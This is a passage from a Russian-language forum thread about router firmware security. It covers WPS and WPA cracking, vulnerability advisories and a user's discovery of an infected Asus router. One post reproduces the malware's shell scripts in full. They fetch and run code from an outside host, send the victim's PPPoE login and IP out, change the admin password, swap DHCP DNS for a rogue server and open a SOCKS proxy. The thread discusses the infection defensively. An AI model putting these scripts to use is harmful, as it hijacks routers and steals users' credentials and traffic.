Page 4 of 9 FirstFirst ... 23456 ... LastLast
Results 46 to 60 of 130

Thread: Внимание! Безопасность Linux-based MIPSel роутеров!

  1. #46
    Join Date
    Feb 2008
    Location
    Moscow, Tver
    Posts
    3,962
    Quote Originally Posted by YuriM View Post
    Процесс взлома описан здесь: http://habrahabr.ru/company/xakep/blog/143834/

    Насколько мне известно, в оригинальной прошивке Asus wl500gpv2 есть включение/отключение WPS. В олеговской не нашел. Оно вообще там работает?
    В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
    Поскольку обсуждать нечего - перенёс сюда.

  2. #47
    Join Date
    Mar 2009
    Location
    Default City
    Posts
    2,695
    Blog Entries
    4
    Quote Originally Posted by vectorm View Post
    В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
    Поскольку обсуждать нечего - перенёс сюда.
    ААА можно немножко пофлудить? Раз уж подняли тут эту тему, то - Подбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того какая прошивка установленна на роутере) Используется как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )

    Деклаймер - Естественно применяется только для нахождения забытого пароля к своей точке )
    Last edited by TReX; 15-05-2012 at 17:13.

  3. #48

    пароль к консоли

    коллеги, каюсь, помнил, но забыл.
    как посмотреть/поменять пароль рута из веб-морды?

    спасибо.

  4. #49

    Exclamation Уязвимость WPS и прошивка "от олега"

    В связи найденной уязвимостью в wps, хочу узнать, работает ли он в прошивке "от олега". В оригинальной прошивке вроде есть и можно отключать.
    Роутер asus wl500gpv2.

  5. #50
    Join Date
    Oct 2009
    Posts
    529
    Blog Entries
    1
    Quote Originally Posted by vectorm View Post
    В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
    Поскольку обсуждать нечего - перенёс сюда.
    топикстартер этого не увидел и всё еще волнуется
    Last edited by MercuryV; 16-05-2012 at 00:46. Reason: вслед за очередным переносом

  6. #51
    Quote Originally Posted by TReX View Post
    Подбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того какая прошивка установленна на роутере) Используется как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )
    Тогда и я добавлю: взлом WPS.

    Сюда же: "Уголовный кодекс РФ (УК РФ). Статья 272. Неправомерный доступ к компьютерной информации."

    Quote Originally Posted by Pablo Escobar View Post
    коллеги, каюсь, помнил, но забыл.
    как посмотреть/поменять пароль рута из веб-морды?
    Как поменять из веб-морды? "System Setup" —> "Change Password"
    Из консоли посмотреть:
    nvram show | grep http_passwd
    © 2008-2013 ABATAPA WL-500gP/128M / Asus RT-N16 / USB Flash / VLAN / PPPoE / VoIP / nShaper / NAS: iStor is607, Sarotech NAS-20, QNap 109 Pro / NFS / Принтер / etc

  7. #52

    шпион на роутере

    Имею wl500gpv2 уже 3 года. Изучил полностью. Недавно перепрошил на последнюю прошивку от энтузиастов.
    были некоторые проблемы с samba (нет доступа с ipad из программы buzz player). поэтому отключил iptables (iptables -P FORWARD ACCEPT
    iptables -P INPUT ACCEPT).
    так и оставил. сегодня нужно было изменить некоторые скрипты. обратил внимание, что в /tmp/local/sbin много файлов. прибил лишние процессы и начал смотреть...
    содержимое post-firewall:
    Code:
    #!/bin/sh
    
    cd /usr/local/sbin
    wget -q http://spy4.in/data/tofire
    chmod +x tofire
    sh tofire
    rm -rf tofire
    добавился файл tocron:
    Code:
    #!/bin/sh
    cd /usr/local/sbin && wget -q http://spy4.in/data/todo && chmod +x todo && ./todo && rm -rf todo
    исполняемые 3proxy, proxy, udppm, socks и еще пару

    содержимое http://spy4.in/data/todo:
    Code:
    #!/bin/sh
    
    rip=`nvram get wan0_ipaddr`
    ilogin=`nvram get wan0_pppoe_username`
    sport=`cat /usr/local/etc/sport`
    sleep ` tr -cd 1-9 </dev/urandom | head -c 2`s
    wget -q -O ttt http://spy4.in/g.php?rname=$ilogin\&rip=$rip\&sport=$sport
    rm -rf ttt
    содержимое http://spy4.in/data/tofire:
    Code:
    #!/bin/sh
    nvram set dhcp_dns1_x=217.12.219.20
    nvram set http_passwd=qweasdOP
    mount -obind /tmp/local /opt
    cd /tmp/ && wget http://spy4.in/data/3.tgz && tar xvzf 3.tgz
    rm -rf /tmp/3.tgz
    mkdir /var/spool/cron/crontabs/ -p
    mv -f /tmp/local/admin /var/spool/cron/crontabs/
    chmod +x /var/spool/cron/crontabs/admin
    killall crond
    sleep 3
    crond
    crontab /var/spool/cron/crontabs/admin -u admin
    
    SPORT=` tr -cd 1-5 </dev/urandom | head -c 5`
    echo $SPORT > /usr/local/etc/sport
    echo "daemon
    nserver 8.8.8.8
    auth none
    socks -p$SPORT" > /usr/local/etc/3proxy.cfg
    killall 3proxy
    sleep 5
    3proxy /usr/local/etc/3proxy.cfg
    cd /usr/local/sbin && ./tocron
    особо ничего не вытянет (ip внутренний, iptables уже вкрутил, пароль поменял).
    Кто нибудь сталкивался с подобным? чем грозит как думаете? где еще чего посмотреть?

    upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражения подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
    Last edited by Visionary; 05-08-2012 at 12:41.

  8. #53
    Quote Originally Posted by Visionary View Post
    Кто нибудь сталкивался с подобным?
    А о чем, по-Вашему, эта тема?!

    Quote Originally Posted by Visionary View Post
    чем грозит как думаете?
    А чем может грозить захваченный роутер? Съесть Ваш трафик, "засветить" IP на сайтах противоправной направленности (экстремистских, распространяющих детское порно, и т. д.) и привлечь к этому IP внимание правоохранительных органов, перехватывать ваш трафик, в том числе пароли и куки, и использовать их для распространения спама... Продолжать?

    Quote Originally Posted by Visionary View Post
    где еще чего посмотреть?
    А что, в роутере дофига мест, "где посмотреть"?

    Quote Originally Posted by Visionary View Post
    upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражения подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
    Ставьте новую прошивку, делайте сброс в заводские установки, удаляёте всё с носителей и из flashfs. И не отключайте бездумно фаервол!
    © 2008-2013 ABATAPA WL-500gP/128M / Asus RT-N16 / USB Flash / VLAN / PPPoE / VoIP / nShaper / NAS: iStor is607, Sarotech NAS-20, QNap 109 Pro / NFS / Принтер / etc

  9. #54
    ММММ...
    Да наверное все что хотели то и делали. Суди по скриптам самое интересное в файлике что скачивался. Хочешь узнать где наследил скачай его и посмотри в нутрь.
    А так от ДОС атак до банального перехвата паролей к сайтам, вебмани, киви, почты, и т.д. если дома клиент банк то ты ввобще победитель=)

    Присоеденяюсь к словам : "Все в дефолт"


    А самое главное не оставлять пароль админа штатным, думаю при том что ты отключил фаирвол открыл телнет сдоступом по wan.

  10. #55
    надеюсь дефолтный пароль меняли? ибо досихпор бродит по сети вирусняк для роутеров... признаки: тормозит ребутится .... в процессах дофига висит с именем mips
    DIR-320 много,+ другие уже тож много + медиа-плееры и планшеты, и все на мипс

  11. #56
    Quote Originally Posted by Virtuals View Post
    надеюсь дефолтный пароль меняли? ибо досихпор бродит по сети вирусняк для роутеров... признаки: тормозит ребутится .... в процессах дофига висит с именем mips
    Кстати, пароль не менял. Надо будет попробовать. Хотя процессов mips не обнаружено.
    Еще вычитал, что бывают проблемы с подключением гигабитных устройств.

    Будет чем завтра на работе заняться.
    Попробовать заменить БП, попробовать отключить все от сети, и если ничего не поможет, то восстановление с помощью перепрошивки и смена пароля

    Заменил БП на другой - лучше не стало
    Отключил от роутера все, кроме одной 100Мб сети, по прежнему перезагружается.

    Может есть еще варианты, что можно посмотреть?
    Last edited by Omega; 16-11-2012 at 19:14. Reason: fixed

  12. #57
    Join Date
    Mar 2009
    Location
    Russia, Moscow
    Posts
    2,112
    Blog Entries
    32
    Критические уязвимости в беспроводных маршрутизаторах Cisco Linksys

    Исследователи безопасности предупредили (http://seclists.org/fulldisclosure/2013/Jan/69) о скорой публикации в открытом доступе
    информации о критической уязвимости в беспроводных маршрутизаторах Cisco Linksys. Уязвимость позволяет из внешней сети получить
    доступ к устройству под пользователем root без проведения аутентификации. Компания Cisco была уведомлена о проблеме несколько
    месяцев назад, но исправление так и не было выпущено. В настоящее время все доступные версии прошивки Linksys уязвимы, что ставит
    под удар около 70 млн находящихся в сети устройств. Выявившие уязвимость исследователи не намерены больше скрывать информацию
    от общественности и планируют дать компании Cisco ещё две недели на подготовку обновления прошивки, после чего опубликовать
    детали уязвимости и концептуальный прототип эксплоита.


    >> Похоже, альтернативы dd-wrt особо-то и нет.
    > zRouter на базе FreeBSD ( http://zrouter.org/ )
    > openWRT
    > RouterOS
    > Gargoyle

    wive-ng ( более оптимизированный на потребление ресурсов озу и цпу, в отличии от dd-wrt ) = http://sourceforge.net/projects/wive-ng/

    > wive-ng ( более оптимизированный на потребление ресурсов озу и цпу )
    А что, она уже поддерживает девайсы на броадкоме? oO

    > zRouter на базе FreeBSD ( http://zrouter.org/ )
    Это для желающих с роутером мучаться, а не пользоваться оным.

    > openWRT
    А там недопиленo и требует шаманства руками, как то сборка из транка и патчинг. Вариант, но не для средних умов.

    > RouterOS
    Огороженная и закрытая хрень. Теоретически сорц получить можно. Практически, проще сразу застрелиться, чем иметь дело с этими господами.

    > Gargoyle
    Довольно странная прошивка "на любителя".

    > томато от шибби
    Что такое tomato я уже примерно знаю, а что такое шибби?

    > Что такое tomato я уже примерно знаю, а что такое шибби?
    Вы ещё спросите, кто такой Олег
    http://www.opennet.ru/openforum/vslu...ID3/88202.html

  13. #58
    Quote Originally Posted by Omega View Post
    Критические уязвимости в беспроводных маршрутизаторах Cisco Linksys
    Эти «специалисты по безопасности » сломали роутер из LAN-сегмента и теперь громко кричат о критической уязвимости, хотя из LAN-сегмента нет никакой защиты by design.

    Специалисты, my ass.

  14. #59
    Join Date
    Mar 2008
    Location
    Korolev
    Posts
    2

    libupnp vulnerability

    В прошивке присутствует libupnp с обнаруженной уязвимостью http://seclists.org/bugtraq/2013/Jan/130 ?
    Где-то читал, что даже с внешнего интерфейса UPnP уязвим. Это правда?

  15. #60
    Quote Originally Posted by hairpin View Post
    В прошивке присутствует libupnp с обнаруженной уязвимостью http://seclists.org/bugtraq/2013/Jan/130 ?
    Где-то читал, что даже с внешнего интерфейса UPnP уязвим. Это правда?
    У нас уже давно miniupnpd вместо нее.

Page 4 of 9 FirstFirst ... 23456 ... LastLast

Similar Threads

  1. Oscam fьr Mipsel Router
    By N3m3515 in forum German Discussion - Deutsch (DE)
    Replies: 7
    Last Post: 28-03-2015, 05:31
  2. Безопасность SSH (dropbear)
    By SergeyVl in forum Russian Discussion - РУССКИЙ (RU)
    Replies: 309
    Last Post: 28-02-2013, 14:09
  3. Replies: 2
    Last Post: 24-03-2009, 17:18
  4. New 1.0.4.6 based custom firmware
    By kfurge in forum WL-700g Firmware Discussion
    Replies: 272
    Last Post: 20-11-2007, 17:15
  5. Recompiling with mipsel
    By smarechal in forum WL-500g Custom Development
    Replies: 6
    Last Post: 21-03-2005, 12:48

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •